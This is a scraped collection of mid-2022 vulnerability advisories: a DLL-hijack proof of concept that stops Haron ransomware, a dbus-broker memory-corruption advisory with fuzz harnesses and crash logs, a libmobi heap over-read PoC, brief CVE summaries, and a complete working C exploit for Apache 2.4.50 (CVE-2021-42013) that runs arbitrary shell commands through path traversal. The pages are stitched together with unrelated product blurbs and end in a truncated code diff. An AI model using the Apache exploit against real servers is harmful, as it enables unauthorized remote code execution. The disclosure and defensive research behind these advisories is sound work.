Haron ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a DLL to execute our own code and control and terminate the malware pre-encryption. The exploit DLL will check if the current directory is "C:\Windows\System32" and if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products as the malware's own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL that just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/dedad693898bba0e4964e6c9a749d380.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Ransom.HaronVulnerability: Code ExecutionDescription: Haron looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.Family: HaronType: PE32MD5: dedad693898bba0e4964e6c9a749d380Vuln ID: MVID-2022-0609Disclosure: 06/06/2022 Exploit/PoC:1) Compile the following C code as "VERSION.dll"2) Place the DLL in same directory as the ransomware3) Optional - Hide it: attrib +s +h "VERSION.dll"4) Run the malware#include "windows.h"//By malvuln//Purpose: Exploit Haron/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///gcc -c VERSION.c -m32//gcc -shared -o VERSION.dll VERSION.o -m32BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Haron\nPWNED By MALVULN", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   GetCurrentDirectory(MAX_PATH, TEXT(buf));   int rc = strcmp("C:\\Windows\\System32", TEXT(buf));     if(rc != 0){     HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom.Haron MVID-2022-0609 Code Execution

Caphyon Ltd Advanced Installer 19.2 was discovered to contain a remote code execution (RCE) vulnerability via the Update Check function.

**Advanced Web Ranking**

Advanced Web Ranking is a website ranking software which helps manage your search engine rankings intelligently.

View website

**Advanced Installer**

Advanced Installer is a powerful, yet easy to use, Windows Installer authoring tool which helps you create .MSI installs in minutes.

View website

**Clang Power Tools**

Clang Power Tools is a Visual Studio extension helping C++ developers modernize and transform their code to C++11/14/17 standards by using LLVM's static analyzer and CppCoreGuidelines.

View website

**Bytes Route**

Create interactive tutorials for any web page without writing code. Bytes Route enables you to learn a web application while using it.

View website

**Wattspeed**

Wattspeed is a free tool that generates snapshots - historical captures of your web pages that include Lighthouse scores, a list of technologies, W3C HTML validator results, DOM size, mixed content info, and more.

View website

CVE-2022-27438: We make great software products.

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

**Botan C++ Crypto Algorithms Library 2.19.2**

Posted Jun 6, 2022

Site botan.randombit.net

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

Changes: Added support for parallel computation in Argon2. Added SSSE3 implementation of Argon2. The OpenSSL provider was incompatible with OpenSSL 3.0. It has been removed. Avoided using reserve in secure\_vector appending, which caused a performance problem. Fixed TLS::Text\_Policy behavior when X25519 is disabled at build time. Fixed several warnings from Clang.

tags | library

SHA-256 | 3af5f17615c6b5cd8b832d269fb6cb4d54ec64f9eb09ddbf1add5093941b4d75

Download | Favorite | View

Botan C++ Crypto Algorithms Library 2.19.2

dbus-broker-29 suffers from multiple memory corruption vulnerabilities. dbus-broker-31 addresses these issues.

SEC Consult Vulnerability Lab Security Advisory < 20220602-0 >=======================================================================               title: Multiple Memory Corruption Vulnerabilities             product: dbus-broker  vulnerable version: dbus-broker-29       fixed version: dbus-broker-31          CVE number: CVE-2022-31212, CVE-2022-31213              impact: medium            homepage: https://github.com/bus1/dbus-broker               found: 2022-01-14                  by: S. Robertz (Office Vienna)                      G. Hechenberger (Office Vienna)                      T. Weber (Office Vienna)                      T. Longin (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"The dbus-broker project is an implementation of a message bus as defined bythe D-Bus specification. Its aim is to provide high performance andreliability, while keeping compatibility to the D-Bus reference implementation.It is exclusively written for Linux systems, and makes use of many modernfeatures provided by recent linux kernel releases."Source: https://github.com/bus1/dbus-brokerBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.Vulnerability overview/description:-----------------------------------1) Stack-Buffer Over-Read (CVE-2022-31212)Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line.c-shquote contains a stack buffer over-read if a malicious Exec line issupplied.2) Null Pointer Dereference (CVE-2022-31213)Multiple Null Pointer references can be found when supplying a malformed XMLconfig file.Proof of concept:-----------------1) Stack-Buffer Over-Read (CVE-2022-31212)Following harness was used to fuzz the function c_shquote_parse_argv() asit is used in src/launch/launcher.c of dbus-broker.------------------------------------------------------#include <sys/types.h>#include <unistd.h>#include <stdio.h>#include <string.h>#include "c-shquote.h"#define SIZE_65KB 66560int main(int argc, char** argv) {   char fuzz_buf[SIZE_65KB] = "";   ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB);   char **out_argv;   ssize_t out_argc;   c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf));   return 0;}----------------------------------------------------------Passing \xff to the STDIN of the testharness will cause following crash:----------------------------------------------------------==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488READ of size 1 at 0x7fff98c675bf thread T0#0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21#1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31#2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21#3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2#4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)#5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d)Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame#0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102This frame has 1 object(s):[32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variableHINT: this may be a false positive if your program uses some custom stack unwind mechanism,swapcontext or vfork(longjmp and C++ exceptions *are* supported)SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 inc_shquote_strncspnShadow bytes around the buggy address:0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 000x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00=>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f30x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f20x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 000x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2Shadow byte legend (one shadow byte represents 8 application bytes):Addressable: 00Partially addressable: 01 02 03 04 05 06 07Heap left redzone: faFreed heap region: fdStack left redzone: f1Stack mid redzone: f2Stack right redzone:f3Stack after return:  f5Stack use after scope: f8Global redzone: f9Global init order: f6Poisoned by user: f7Container overflow: fcArray cookie: acIntra object redzone: bbASan internal: feLeft alloca redzone: caRight alloca redzone: cb==21744==ABORTING------------------------------------------------------The error occurs in the functions  c_shquote_strnspn() and c_shquote_strncspn().Both allocate a buffer like this:bool buffer[UCHAR_MAX] = {};UCHAR_MAX is defined in the C standard header limits.h and equals 255. Thus,array indexes of 0-254 can be addressed.However, the buffer will then be accessed like this:buffer[(unsigned char)string[i]], where string is the commandline from STDIN(or the EXEC line in case of dbus-broker services).Passing \xff will thus read an out of bounds array element.2) Null Pointer Dereference (CVE-2022-31213)The dbus-broker config parser uses the expat library to parse XML files.<limit name="max_pendingonment"/> is a valid XML line. Thus expat will parseit correctly. As no value is supplied in the statement, thelimit_max_pendingonment parameter will contain a Null pointer. DBus-broker doesnot validate the result and tries to dereference the field, causing a crash.Multiple other XML edge case can be found that cause the expat library tocorrectly return a Null pointer, but are not handled correctly by thedbus-broker.Including <limit name="max_pendingonment"/>  causes following error message:-------------------------Program received signal SIGSEGV, Segmentation fault.0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid-2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1-28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32-2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64(gdb) bt#0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6#1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at../src/util/string.c:42#2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c"limit") at ../src/launch/config.c:1140#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1#5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1#6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0,node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at../src/launch/config.c:1289#7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28,path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at../src/launch/config.c:1347#8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at../src/launch/harness-config.c:24-------------------------Following harness was used:-------------------------#include <c-list.h>#include <c-stdaux.h>#include <stdlib.h>#include "launch/config.h"#include "launch/nss-cache.h"#include "util/dirwatch.h"int main(int argc, char **argv) {_c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser);_c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL;_c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT;_c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL;int r;r = dirwatch_new(&dirwatch);config_parser_init(&parser);r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch);return 0;}-------------------------Following config file will cause another error:-------------------------00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354  ..<!DOCT00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f  YPE g PUBLIC "-/00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363  N". "htt">.<busc00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73  onfig>.. <type>s00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a  d</type><fork/>.00000050: 203c 7374 616e 6461 7264 5f73 7973 e803   <standard_sys..00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a  m_servicedirs/>.00000070: 203c 7365 7276 6963 6564 6972 2072 6563   <servicedir rec00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72  eive_type="error00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569  "/>.<allow recei000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22  ve_type="signal"000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64  />-> <allow send000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a  _destination="".000000d0: 2020 2073 656e 645f 696e 7465 7266 6163     send_interfac000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073  e="" />.<allow s000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d  end_destina}ion=00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572  "".   send_inter00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d  face="ore"/> <!-00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64  - --> <deny send00000130: 5f64 6573 74                             _dest-------------------------The error is following:-------------------------id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2--/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8:standard_sysm_servicedirsUnknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2--/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9:receive_type="error"Program received signal SIGSEGV, Segmentation fault.0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6#0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6#1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6#2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c"servicedir") at ../src/launch/config.c:1130#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1#5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1#6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1#7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1#8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0,node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at../src/launch/config.c:1289#9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18,path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at../src/launch/config.c:1347#10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at../src/launch/harness-config.c:24-------------------------Vulnerable / tested versions:-----------------------------The Git Master branch (dbus-broker-29) has been tested and found to bevulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732).Furthermore, it also contains the vulnerable c-shquote library (testedat commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d).Vendor contact timeline:------------------------2022-04-01: Contacting vendor email.2022-04-04: Sending advisory via unencrypted email.2022-04-19: Bugs are fixed. New version will be released 2022-04-20.2022-05-10: dbus-broker-30 released.2022-05-16: dbus-broker-31 released with further fixes.2022-06-02: Release of security advisory.Solution:---------Update to the latest version. The vendor provides an updated version v30.v31 is available now which should be used as other introduced bugs have beenfixed there:https://github.com/bus1/dbus-broker/releases/tag/v31Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF S. Robertz, G. Hechenberger, T. Weber, T. Longin / @2022

dbus-broker-29 Memory Corruption

Apache version 2.4.50 remote code execution exploit that leverages a traversal as identified in CVE-2021-42013. Written in C.

    #include <stdio.h>#include <stdlib.h>#include <stdbool.h>#include <string.h>#include <curl/curl.h>/* Apache 2.4.50 exploit (CVE-2021-42013) * Author: Vilius Povilaika * Website: www.povilaika.com */// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013int usage(char* prog){  printf("Usage: %s <host> <exec>\n", prog);  printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);  return 0;}bool error(const char* reason){  printf("[ERR] Critical error - %s\n", reason);  return false;}struct callback_result {  char* data;  size_t size;};static size_t callback(void* pointer, size_t size, size_t nmemb, void* data){  struct callback_result *memory = (struct callback_result *)data;  char* ptr = realloc(memory->data, memory->size+nmemb+1);  memory->data = ptr;  memcpy(&(memory->data[memory->size]), pointer, nmemb);  memory->size += nmemb;  memory->data[memory->size] = 0;  return nmemb;}bool exploit(void* result, char* host, char* exec){  CURL *curl = curl_easy_init();  char url[256];  sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);  curl_easy_setopt(curl, CURLOPT_URL, url);  char payload[256];  sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);  curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);  curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);  curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);  int res = curl_easy_perform(curl);  if (res != CURLE_OK)    return error(curl_easy_strerror(res));  curl_easy_cleanup(curl);  return true;}int main(int argc, char* argv[]){  if (argc != 3)    return usage(argv[0]);  struct callback_result result = {0};  bool res = exploit(&result, argv[1], argv[2]);  if (res)    printf("[+] Exploit finished successfully, check output\n");  else    printf("[-] Exploit failed, check output\n");  printf(" \n%s\n", result.data);  return 0;}

Apache 2.4.50 Remote Code Execution

Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.

**Description**

A heap-buffer-overflow in mobi\_decode\_infl in index.c

**Env**

Distributor ID: Ubuntu Description: Ubuntu 20.04 LTS Release: 20.04 Codename: focal mobitool build: May 3 2022 20:46:07 (clang Ubuntu Clang 11.1.0) libmobi: 0.10

**Build**

    export CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan"
    autogen.sh &&  ./configure && make
    

**Proof of Concept**

    wget https://github.com/beidasoft-cobot-oss-fuzz/poc/raw/main/poc_4d04e9e069e38fd86b6e00dc336f841b
    ./tools/mobitool -e -o ./tmp poc_4d04e9e069e38fd86b6e00dc336f841b
    

**ASan**

    ➜  libmobi ./tools/mobitool -e -o ./tmp poc_4d04e9e069e38fd86b6e00dc336f841b                                 
    Title: Libmobi sample file
    Author: Bartek Fabiszewski
    Subject: Dictionaries
    Language: pl (utf8)
    Dictionary: pl => en
    __
    Mobi version: 7
    Creator software: kindlegen 2.9.0 (linux)
    
    Reconstructing source resources...
    =================================================================
    ==3656201==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000fd1 at pc 0x000000352b89 bp 0x7ffd04d15d00 sp 0x7ffd04d15cf8
    READ of size 1 at 0x602000000fd1 thread T0
        #0 0x352b88 in mobi_decode_infl /work/fuzz/soft/libmobi/src/index.c:949:17
        #1 0x341fda in mobi_reconstruct_infl /work/fuzz/soft/libmobi/src/parse_rawml.c:1423:28
        #2 0x343bf0 in mobi_reconstruct_orth /work/fuzz/soft/libmobi/src/parse_rawml.c:1582:23
        #3 0x345e57 in mobi_reconstruct_links_kf7 /work/fuzz/soft/libmobi/src/parse_rawml.c:1800:15
        #4 0x346467 in mobi_reconstruct_links /work/fuzz/soft/libmobi/src/parse_rawml.c:1849:15
        #5 0x349795 in mobi_parse_rawml_opt /work/fuzz/soft/libmobi/src/parse_rawml.c:2153:15
        #6 0x34811e in mobi_parse_rawml /work/fuzz/soft/libmobi/src/parse_rawml.c:2009:12
        #7 0x316a37 in loadfilename /work/fuzz/soft/libmobi/tools/mobitool.c:852:20
        #8 0x315e78 in main /work/fuzz/soft/libmobi/tools/mobitool.c:1051:11
        #9 0x7feb675790b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x267aad in _start (/work/fuzz/soft/libmobi/tools/mobitool+0x267aad)
    
    0x602000000fd1 is located 0 bytes to the right of 1-byte region [0x602000000fd0,0x602000000fd1)
    allocated by thread T0 here:
        #0 0x2e177d in malloc (/work/fuzz/soft/libmobi/tools/mobitool+0x2e177d)
        #1 0x34ead6 in mobi_parse_index_entry /work/fuzz/soft/libmobi/src/index.c:372:41
        #2 0x34c846 in mobi_parse_indx /work/fuzz/soft/libmobi/src/index.c:667:23
        #3 0x351046 in mobi_parse_index /work/fuzz/soft/libmobi/src/index.c:721:15
        #4 0x34957c in mobi_parse_rawml_opt /work/fuzz/soft/libmobi/src/parse_rawml.c:2134:19
        #5 0x34811e in mobi_parse_rawml /work/fuzz/soft/libmobi/src/parse_rawml.c:2009:12
        #6 0x316a37 in loadfilename /work/fuzz/soft/libmobi/tools/mobitool.c:852:20
        #7 0x315e78 in main /work/fuzz/soft/libmobi/tools/mobitool.c:1051:11
        #8 0x7feb675790b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /work/fuzz/soft/libmobi/src/index.c:949:17 in mobi_decode_infl
    Shadow bytes around the buggy address:
      0x0c047fff81a0: fa fa 00 fa fa fa 06 fa fa fa 04 fa fa fa 04 fa
      0x0c047fff81b0: fa fa 04 fa fa fa 00 fa fa fa 01 fa fa fa 00 04
      0x0c047fff81c0: fa fa 00 04 fa fa 01 fa fa fa 00 04 fa fa 00 04
      0x0c047fff81d0: fa fa 00 03 fa fa 04 fa fa fa 00 05 fa fa 04 fa
      0x0c047fff81e0: fa fa 00 07 fa fa 04 fa fa fa 00 03 fa fa 04 fa
    =>0x0c047fff81f0: fa fa 00 fa fa fa 04 fa fa fa[01]fa fa fa 04 fa
      0x0c047fff8200: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa
      0x0c047fff8210: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fa
      0x0c047fff8220: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
      0x0c047fff8230: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8240: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:        
    

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

CVE-2022-1987: A heap-buffer-overflow in mobi_decode_infl in index.c in libmobi

net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.

CVE-2022-32250: security - Linux Kernel use-after-free write in netfilter

Percona XtraBackup 2.4.20 unintentionally writes the command line to any resulting backup file output. This may include sensitive arguments passed at run time. In addition, when --history is passed at run time, this command line is also written to the PERCONA_SCHEMA.xtrabackup_history table. NOTE: this issue exists because of an incomplete fix for CVE-2020-10997.

Date

April 26, 2022

Percona XtraBackup for MySQL Databases enables MySQL backups without blocking user queries. Percona XtraBackup is ideal for companies with large data sets and mission-critical applications that cannot tolerate long periods of downtime. Offered free as an open source solution, Percona XtraBackup drives down backup costs while providing unique features for MySQL backups.

Percona XtraBackup 2.4 does not support making backups of databases created in _MySQL 8.0_, _Percona Server for MySQL 8.0_, or _Percona XtraDB Cluster 8.0_. Use Percona XtraBackup 8.0 to make backups for these versions.

*   Release Highlights
    
*   New Features
    
*   Bugs Fixed
    
*   Useful Links
    

**Release Highlights¶**

The xbcloud binary adds support for the Microsoft Azure Cloud Storage using the REST API.

**New Features¶**

*   PXB-1883: Implements support for Microsoft Azure Cloud Storage in the xbcloud binary. (Thanks to Ivan Groenewold for reporting this issue)
    

**Bugs Fixed¶**

*   PXB-2608: Upgraded the Vault API to V2 (Thanks to Benedito Marques Magalhaes for reporting this issue)
    
*   PXB-2649: Fix for compilation issues on GCC-10.
    
*   PXB-2648: CURL prior to 7.38.0 version doesn’t use CURLE\_HTTP2 and throws an error 'CURLE_HTTP2' is not a member of 'CURLcode'. Added CURLE\_OBSOLETE16 as a connectivity error code. In CURL versions after 7.38.0, CURLE\_OBSOLETE16 is translated to CURLE\_HTTP2.
    
*   PXB-2711: Fix for libgcrypt initialization warnings in xtrabackup.
    
*   PXB-2722: Fix for when via command line, a password, passed using the -p option, was written into the backup tool\_command in xtrabackup\_info.
    

**Useful Links¶**

*   The Percona XtraBackup installation instructions
    
*   The Percona XtraBackup downloads
    
*   The Percona XtraBackup GitHub location
    
*   To contribute to the documentation, review the Documentation Contribution Guide

CVE-2022-26944: Percona XtraBackup 2.4.25 — Percona XtraBackup 2.4 Documentation

libdwarf 0.4.0 has a heap-based buffer over-read in _dwarf_check_string_valid in dwarf_util.c.

CVE-2022-32200: DA's Libdwarf Vulnerabilities

Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a stack overflow via the component DesktopEditor/common/File.cpp.

@@ -159,60 +159,90 @@ namespace NSFile else if (0x00 == (byteMain & 0x20)) { // 2 byte int val = (int)(((byteMain & 0x1F) << 6) | (pBuffer\[lIndex + 1\] & 0x3F)); int val = 0; if ((lIndex + 1) < lCount) { val = (int)(((byteMain & 0x1F) << 6) | (pBuffer\[lIndex + 1\] & 0x3F)); }  
pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 2; } else if (0x00 == (byteMain & 0x10)) { // 3 byte int val = (int)(((byteMain & 0x0F) << 12) | ((pBuffer\[lIndex + 1\] & 0x3F) << 6) | (pBuffer\[lIndex + 2\] & 0x3F)); int val = 0; if ((lIndex + 2) < lCount) { val = (int)(((byteMain & 0x0F) << 12) | ((pBuffer\[lIndex + 1\] & 0x3F) << 6) | (pBuffer\[lIndex + 2\] & 0x3F)); }  
pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 3; } else if (0x00 == (byteMain & 0x0F)) { // 4 byte int val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); int val = 0; if ((lIndex + 3) < lCount) { val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); }  
